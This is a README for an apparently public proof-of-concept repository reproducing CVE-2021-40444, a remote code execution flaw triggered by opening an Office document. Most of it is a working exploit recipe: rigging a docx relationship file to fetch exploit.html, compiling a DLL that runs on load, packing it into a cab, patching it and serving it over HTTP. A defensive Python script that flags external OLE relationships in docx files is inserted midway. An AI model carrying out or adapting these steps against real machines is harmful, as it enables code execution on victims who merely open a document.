L1nkd34d/CVE-2021-40444
CVE-2021-40444

Reproduce steps for CVE-2021-40444

These reproduction steps are based on some reverse engineering of the sample used in the wild: 938545f7bbe40738908a95da8cdeabb2a11ce2ca36b0f6a74deda9378d380a52 (docx file).

Generating docx

Go to maldoc/word/_rels/document.xml.rels and replace the two occurrences of http://<HOST> with the URL of the exploit.html file, e.g. http://127.0.0.1/exploit.html.

Generate docx:

cd maldoc/ ; zip -r maldoc.docx *
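As an added defensive counterpart to the step above (example code written for this page, not part of the L1nkd34d/CVE-2021-40444 repository): a triage script that unzips a .docx and reports every relationship entry whose TargetMode is External and whose Target is a remote URL, which is exactly the part of the package that the step edits. An external oleObject relationship is treated as the strong signal, since ordinary web hyperlinks are also External but are common in clean documents. The minimal sample document is constructed in memory, and example.invalid is a placeholder host; the relationship namespace and type URIs are the standard OOXML ones.

```python
"""Triage check for .docx files whose relationship parts point at an external
URL, the delivery pattern used by the CVE-2021-40444 document described above.
Added example for defenders; not code from the L1nkd34d/CVE-2021-40444 repository.
"""
import io
import sys
import zipfile
import xml.etree.ElementTree as ET

# Standard OOXML package-relationships namespace and Office relationship-type prefix.
RELS_NS = "http://schemas.openxmlformats.org/package/2006/relationships"
OFFICE_REL = "http://schemas.openxmlformats.org/officeDocument/2006/relationships/"
# URL schemes worth flagging when they appear as an External relationship target.
REMOTE_SCHEMES = ("http://", "https://", "mhtml:", "file:")


def find_external_rels(docx_bytes):
    """Return a list of (part, rel_id, rel_type, target) for every relationship
    in any *.rels part that is marked External and targets a remote URL."""
    findings = []
    with zipfile.ZipFile(io.BytesIO(docx_bytes)) as zf:
        for name in zf.namelist():
            if not name.endswith(".rels"):
                continue
            try:
                root = ET.fromstring(zf.read(name))
            except ET.ParseError:
                # A rels part that does not parse is itself worth a look; report it.
                findings.append((name, None, "unparseable", ""))
                continue
            for rel in root.iter("{%s}Relationship" % RELS_NS):
                if rel.get("TargetMode") != "External":
                    continue
                target = rel.get("Target", "")
                if target.lower().startswith(REMOTE_SCHEMES):
                    rel_type = rel.get("Type", "").replace(OFFICE_REL, "")
                    findings.append((name, rel.get("Id"), rel_type, target))
    return findings


def is_suspicious(findings):
    """Web hyperlinks are normal; an embedded OLE object fetched from a URL is not."""
    return any(rel_type == "oleObject" for _, _, rel_type, _ in findings)


def build_sample_docx(with_external_ole):
    """Constructed minimal .docx used only to exercise the checker offline."""
    ole = ""
    if with_external_ole:
        ole = ('<Relationship Id="rId9" Type="%soleObject" '
               'Target="http://example.invalid/exploit.html" '
               'TargetMode="External"/>' % OFFICE_REL)
    rels = ('<?xml version="1.0" encoding="UTF-8" standalone="yes"?>'
            '<Relationships xmlns="%s">'
            '<Relationship Id="rId1" Type="%sstyles" Target="styles.xml"/>'
            '<Relationship Id="rId2" Type="%shyperlink" '
            'Target="https://example.invalid/" TargetMode="External"/>'
            '%s</Relationships>' % (RELS_NS, OFFICE_REL, OFFICE_REL, ole))
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as zf:
        zf.writestr("[Content_Types].xml", "<Types/>")
        zf.writestr("word/document.xml", "<document/>")
        zf.writestr("word/_rels/document.xml.rels", rels)
    return buf.getvalue()


if __name__ == "__main__":
    # Usage: python3 check_docx_rels.py file1.docx [file2.docx ...]
    for path in sys.argv[1:]:
        with open(path, "rb") as fh:
            hits = find_external_rels(fh.read())
        for part, rel_id, rel_type, target in hits:
            print("%s: %s %s %s -> %s" % (path, part, rel_id, rel_type, target))
        verdict = "SUSPICIOUS" if is_suspicious(hits) else "no external OLE relationship"
        print("%s: %s" % (path, verdict))
```

Run it over a mail-gateway quarantine or a sample directory; the per-relationship lines give the analyst the exact URL to block or pivot on, and the verdict line is what a pipeline would key on.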

Generating malicious cab

Save the following as calc.c:

#include <windows.h>
#include <stdlib.h>

/* Payload: launches Calculator as a visible sign that the DLL ran. */
void exec(void) {
    system("C:\\Windows\\System32\\calc.exe");
}

BOOL WINAPI DllMain(HINSTANCE hinstDLL, DWORD fdwReason, LPVOID lpReserved)
{
    switch (fdwReason)
    {
        case DLL_PROCESS_ATTACH:
            /* Runs as soon as the DLL is loaded into the process. */
            exec();
            break;

        case DLL_THREAD_ATTACH:
        case DLL_THREAD_DETACH:
        case DLL_PROCESS_DETACH:
            break;
    }
    return TRUE;
}

Compile it:

i686-w64-mingw32-gcc -shared calc.c -o calc.dll

Generate the cab (install lcab first: sudo apt-get install lcab):

cp calc.dll championship.inf ; mkdir gen/ ; cd gen/ ; lcab '../championship.inf' out.cab

Copy out.cab into the www/ directory and modify exploit.html to point to http://127.0.0.1/out.cab.

Run the Python script patch_cab.py.

Finally, set up the server:

cd www/ ; sudo python3 -m http.server 80

End

Now open maldoc.docx in the target VM.

If it does not work, make sure there is a championship.inf file at C:\Users\<user>\AppData\Temp\

If the file is present but the DLL did not get executed, make sure you are opening the docx from a folder that exploit.html reaches, such as Documents, Desktop, or Downloads.

More

To automatically resolve the array obfuscation in the HTML file, use deobfuscate.py (the mutated array is already hardcoded in it).

There is also a deobfuscated version already: deob.html
